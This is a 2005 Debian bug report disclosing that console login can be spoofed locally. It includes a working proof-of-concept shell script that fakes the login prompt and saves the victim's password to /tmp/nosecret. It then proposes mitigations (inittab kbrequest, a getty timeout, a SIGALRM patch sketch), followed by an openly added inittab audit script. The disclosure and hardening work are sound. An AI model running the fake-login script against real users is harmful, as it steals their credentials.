[Pkg-shadow-devel] Bug#305600: login is vulnerable to local phishing attacks

Gerhard Schrenk <gps@mittelerde.physik.uni-konstanz.de>, 305600@bugs.debian.org
Thu, 21 Apr 2005 02:33:35 +0200


Package: login
Version: 1:4.0.3-30.7
Severity: important
Tags: security

Every local user can simply start a little program that imitates login and
grabs the password, pretending it was wrong. It is really hard for the average
user to spot the difference and to make sure that he really didn't mistype the
password. Most users have no read access to /var/log/auth.log and thus cannot
check afterwards. If the attacker crashes X so that it doesn't restart
(unreproducible, but quite easy for users who have reached their quota limit...)
and disables ssh (by pulling the network cable), he has a good chance of getting
the password of the local admin/root.

Proof of concept:

#!/bin/sh
# start with exec ./scriptname
trap '' INT TSTP
clear
echo
echo "Debian GNU/Linux 3.1 medusa tty1"
echo
read -p "medusa login: " user
stty -echo
read -p "Password: " nosecret
stty echo
echo
echo $nosecret > /tmp/nosecret
sleep 3
echo "Login incorrect"
echo
exec login

IMHO the easiest security enhancement for password-based local
authentication seems to be (anyone have better ideas?) key sequences that can
only be caught by the kernel or by programs that are suid root.

For example, one can put the line
  kb::kbrequest:fuser -KILL -ksn file /dev/tty$(fgconsole)
in /etc/inittab. Then one *can* "zap" the console every time to respawn getty
and login.

In a multiuser (lab) environment it would be desirable if the admin
could enforce such a safe key sequence before getty/login starts. I have
played with 'getty -t' and/or s/respawn/once/ in /etc/inittab but have not
yet found a satisfying solution.

The best solution I found was to spawn the getty with a timeout, e.g.
  3:23:respawn:/sbin/getty -t 60 38400 tty3
and to patch the default getty (agetty.c in util-linux) with an additional
signal handler for SIGALRM. Now the user *must* first kill the timed-out getty
with the safe(?) kbrequest. Quick 'n dirty idea:

#include <signal.h>
#include <string.h>

/* When the -t timeout fires, freeze this getty instead of exiting; it
   stays on the console until the kbrequest entry in inittab kills it. */
static void sigalrm_handler(int sig) {
  (void)sig;                 /* signal number not needed */
  raise(SIGSTOP);
}
...
struct sigaction sa;
memset(&sa, 0, sizeof(sa));  /* no extra flags, empty mask */
sa.sa_handler = sigalrm_handler;
sigaction(SIGALRM, &sa, NULL);
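An added example, not from the bug report or from the shadow/util-linux packages: a small POSIX sh audit of an inittab for the two mitigations described above, the kb::kbrequest entry and a -t timeout on every respawning getty. The function names are my own and the sample inittab is constructed.

```shell
# Audit an inittab (format: id:runlevels:action:process) for the two
# mitigations discussed above. Function names are assumptions for this example.

# Succeeds if the file has an uncommented kbrequest entry.
has_kbrequest() {
    grep -q '^[^#][^:]*:[^:]*:kbrequest:' "$1"
}

# Prints "id process" for every getty started by respawn/once without -t.
gettys_without_timeout() {
    grep -v '^[[:space:]]*#' "$1" | while IFS=: read -r id levels action process; do
        case "$action" in respawn|once) ;; *) continue ;; esac
        case "$process" in *getty*) ;; *) continue ;; esac
        case " $process" in *" -t "*) ;; *) echo "$id $process" ;; esac
    done
}

# Returns 0 when both mitigations are present, 1 otherwise, printing findings.
audit_inittab() {
    rc=0
    has_kbrequest "$1" || { echo "no kbrequest entry in $1"; rc=1; }
    missing=$(gettys_without_timeout "$1")
    if [ -n "$missing" ]; then
        echo "gettys without -t timeout:"; echo "$missing"; rc=1
    fi
    return $rc
}

# Constructed sample inittab (not a real system file) for demonstration.
SAMPLE_INITTAB=$(mktemp)
cat > "$SAMPLE_INITTAB" <<'EOF'
# /etc/inittab: constructed example
id:2:initdefault:
kb::kbrequest:fuser -KILL -ksn file /dev/tty$(fgconsole)
1:2345:respawn:/sbin/getty 38400 tty1
2:2345:respawn:/sbin/getty 38400 tty2
3:23:respawn:/sbin/getty -t 60 38400 tty3
EOF

# tty1 and tty2 are reported: their getty never times out, so a fake login
# left running on them cannot be cleared by the kbrequest entry alone.
if audit_inittab "$SAMPLE_INITTAB"; then
    echo "inittab: both mitigations in place"
else
    echo "inittab: hardening incomplete"
fi
rm -f "$SAMPLE_INITTAB"
```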

Since I don't yet know the *right* Debian default solution, I open
this bug against login.

-- Gerhard

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.11.6-clients
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages login depends on:
ii  libc6                       2.3.2.ds1-20 GNU C Library: Shared libraries an
ii  libpam-modules              0.76-22      Pluggable Authentication Modules f
ii  libpam-runtime              0.76-22      Runtime support for the PAM librar
ii  libpam0g                    0.76-22      Pluggable Authentication Modules l

-- no debconf information